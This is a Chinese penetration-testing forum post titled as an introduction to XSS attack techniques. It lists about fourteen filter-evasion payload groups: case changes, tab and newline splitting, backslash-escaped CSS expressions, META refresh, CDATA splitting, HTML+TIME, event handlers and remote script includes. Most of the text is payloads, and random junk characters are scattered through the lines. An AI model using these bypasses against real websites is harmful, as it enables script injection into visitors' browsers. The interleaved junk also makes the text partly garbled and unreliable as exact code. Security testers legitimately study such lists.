中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]
作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写) I  |1 T1 Q9 X% s; \- k7 R

7 e* ^0 d6 C! m. G1 ]5 C
) y; q* @/ F3 o
. w" J6 q3 E2 O/ e. e    <sCript>alert(‘d’)</scRipT>
; `8 B7 t$ P7 Q% S5 A+ |) j" q) C+ c; s' T4 Y( u
2. 利用多加一些其它字符来规避Regular Expression的检查% t8 J9 f9 h* i
  V, V# C" I- V  G* t& A1 [
    <<script>alert(‘c’)//<</script>0 x+ X, d0 Y2 C3 L' P& F; n( R
! ?4 a! S& i0 x- K8 {- w
    <SCRIPT a=">" SRC="t.js"></SCRIPT>! @+ p# `# R5 Z' Z3 Z* l$ a* R

0 Z' H1 h7 r$ Z2 n& H4 n    <SCRIPT =">" SRC="t.js"></SCRIPT>* D9 ~; s/ D3 {+ y- N: I* D

* d, N9 j# [6 E4 B1 v# q" J, O    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
& P9 A' Y9 X2 F* k
7 c+ I& `/ o9 I4 ]( G    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
6 |8 ?2 \/ d5 T1 _$ R
* C( C  `8 c. D4 y% [; h! R    <SCRIPT a=`>` SRC="t.js"></SCRIPT>
1 e: W( S% z6 n; ~( J$ c
9 k0 i6 y" p. ^9 k    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
4 L# C) c% u, T) \5 p- i
. O/ u) p% u/ G) ~' A# u3. 以其它扩展名取代.js
8 W- N- `) Y: \8 D( `
. w0 T% V: \* x3 c    <script src="bad.jpg"></script>
; r" S( v/ T+ ]. h& U& t$ I: m/ P3 C# v
4. 将Javascript写在CSS档里/ E& S, B- h' a$ O9 q/ L  }. Y3 v
3 A9 G4 g8 }# s! @- N
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
: B9 z% y4 q1 _% h3 p
- x# m! w0 b! d  b5 v" g       example:: H% p0 J# ~5 r

. X2 C: J' w9 C* f" v& h) q          body {
! b9 J- w2 b+ P0 P- o7 O* R& @) ^7 S
               background-image: url(‘javascript:alert("XSS");’)
! c$ g7 v- O/ m% M: [, p; B) w
, u9 B& U1 X( f7 k1 N# A          }
) w8 N4 p! J0 \! W
0 A6 g  d8 O5 b" P& U# A* _1 v5. 在script的tag里加入一些其它字符5 {: [2 ]: M' N0 M8 i

( L1 Q( r! e; L    <SCRIPT/SRC="t.js"></SCRIPT>
  Z5 F" j8 a5 ]7 g9 l
+ Q' i, U) V. w1 x6 ^    <SCRIPT/anyword SRC="t.js"></SCRIPT>
+ |/ B8 K9 X0 d7 ?
) y1 Q1 P' S& G4 d6. 使用tab或是new line来规避! g2 ]' y: w/ i0 h% F

0 _5 }6 F6 \! u$ r    <img src="jav ascr ipt:alert(‘XSS3′)">
5 z3 c. l+ k7 x* j1 M& z! I! C
0 s3 O. ?2 i6 P5 L' k    <img src="jav ascr ipt:alert(‘XSS3′)">
6 p/ i$ }+ O1 E6 \, y. b2 a4 ~1 j' K0 _2 k! ]
    <IMG SRC="jav ascript:alert(‘XSS’);">
! L$ l( b5 g: g4 m( X7 \
8 h3 |3 b+ d$ L' Y' j/ O" Q& h         -> tag
' V0 W3 u% d/ G& N1 u. }; L* Z! B( X& W: Y. l
         -> new line
# _( b: ~' x: h. [( ^5 |3 W2 L0 _2 p) e( J
7. 使用"\"来规避, i9 A/ C5 m) L4 G. w! ]" v

  ^9 F" d' N# N1 e: f) o& E& t    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>" A/ `8 Q! G5 Y; [! [1 y

& q+ T1 V& y' i4 X    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>2 u0 O6 B- O; w0 K; F9 k

7 x1 W* O* c" d/ W    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
* a# a; \# O% @- K4 K
. I* `* g* g1 w. d7 o    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">0 `5 x# w9 u* V: c, x* g  u
' u- A" F- W3 J( w8 K4 Z
    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>9 ^  H$ A+ I0 f( X' G

/ z  G( d$ g/ \6 M0 U* l8. 使用Hex encode来规避(也可能会把";"拿掉)4 ^- g* i' j. t/ p7 f

$ `: J& H9 A1 {$ t& s! c    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">9 u' e7 P* x: N* A

9 F4 x& X1 y  @1 j. d8 E        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
; w& D& B. m4 `9 y6 s) N( Y$ r; X1 E6 T8 E
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
+ t4 w. s2 `. o  Y  T. O# B: D2 G& C* h) {& V$ T# M  T9 h8 i
        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">* M$ o6 f' i8 j" u7 L* n) O) j
* e0 h) Z8 X) O- |
9. script in HTML tag
1 [! y% B# B! K( ]. p0 W; V3 s9 K; d5 o, C1 f
    <body onload=」alert(‘onload’)」>9 S5 l  k; N1 r! G7 X& @- ]5 e! Q

% q# v  y' Y) a        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload- S# G- l% R, `- N& A2 K& G: K; c

0 \8 J' V7 ~( I- s8 w7 z/ n+ t10. 在swf里含有xss的code9 |) a. e3 m- v$ i3 Z  E

& p) O$ x0 z; m+ l9 K3 D    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>: _" x9 ~2 i: K2 R: m" q& j4 K

" S% `4 A/ N& x9 [4 k& V11. 利用CDATA将xss的code拆开,再组合起来。. g! [, c4 z  R8 y7 e+ U3 G

5 M7 Y% Q; p9 r& v+ `* T$ o" ]" M" _    <XML ID=I><X><C>
/ f4 d* `4 |% f: @8 f
9 x9 q- S0 y1 _: V    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
- P. h6 s& V& E5 I9 I1 W3 {7 _6 ?% ]& L% U. Q& E/ @2 u# _
    </C></X>" {* z( s' A$ B0 E0 P# i9 p% y

4 T  ^' v4 }6 r    </xml>
* k% `% ]7 H" F  Z9 n6 h
6 T. O; l: I9 ~9 V2 k    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" s% N6 Z9 p. U9 r8 v$ [
* T1 c- k9 j# v
    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
3 H5 V  j1 d' H# F; L0 A& H8 ?0 m$ c$ a+ Q
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>7 Y: A. R- w6 n# W& r, J" y  ^( H

8 c- _# H5 L1 A# A3 t12. 利用HTML+TIME。
, f8 Y) [  m2 q% t
+ @1 L, K7 p4 ~" e, S$ a+ ?1 l" m    <HTML><BODY>
9 ^$ E% @3 h2 _% b$ V/ ?4 Y& s: G9 D( Y0 o6 q) T
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">" j; ?5 X2 @; `) N+ p9 G4 S
: |3 Z' `& a6 f7 ~% X. P$ |% T4 [
    <?import namespace="t" implementation="#default#time2">
" f) V- ^# ^9 o3 E
, q( h8 Z. U5 Q8 _3 i    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
$ ~+ E3 t, J9 Y/ s* C3 J! G, z, ]  P, C' T" @
    </BODY></HTML>4 d! A4 U" F3 d) p

* E" A: I( t% m13. 透过META写入Cookie。
4 K. h. p1 u' N8 |4 Q/ Y$ w5 i, C/ ^) p
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
# u5 V0 U8 I- c7 q
8 Y; ~6 L9 r1 H3 {6 ]14. javascript in src , href , url
0 a' M# h3 y% G4 Y. x/ e$ T. Q0 Q+ P( b: Q; E
    <IFRAME SRC=javascript:alert(’13′)></IFRAME>; q7 j: G6 Y5 s# U5 H

  h4 G1 E- S4 k2 d) I& |9 k# G    <img src="javascript:alert(‘XSS3′)">
. Z9 r# w  y: j1 u( w3 c
& s! L+ c- w8 k<IMG DYNSRC="javascript:alert(‘XSS20′)">
" A! P) `& B9 L  @
0 n7 q8 \& ]/ ]5 h1 l    <IMG LOWSRC="javascript:alert(‘XSS21′)">
% b2 k2 o0 b% j6 F- Z& ]3 {
" n; w9 e9 ?8 l    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);"># |7 p* ^( L. o% x+ {
1 M2 \- ?- M! Y0 [+ `
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>1 y6 U! h+ @) a" @

8 Z' x' ?: s! r. e/ N    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">6 b3 ^& N2 p: h+ z& L" ^2 q
$ d2 n) I, H' N1 r8 w: t, n
    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">7 D5 b1 O2 V% G: }* z) n5 k5 N

# }" ?* e& n( ]) t    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
% I0 g! v9 o( P2 d, z  \8 _7 p* G0 G+ Z% I& u* U  _+ H
    </STYLE><A CLASS=XSS></A>! ?8 e4 w$ J# R2 R3 A

! z' V6 h. r1 @! U6 B. x( `( _$ C    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
6 Q1 B1 s; _  i& r
9 U) U7 _; M2 k. ^( M5 x& ~



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2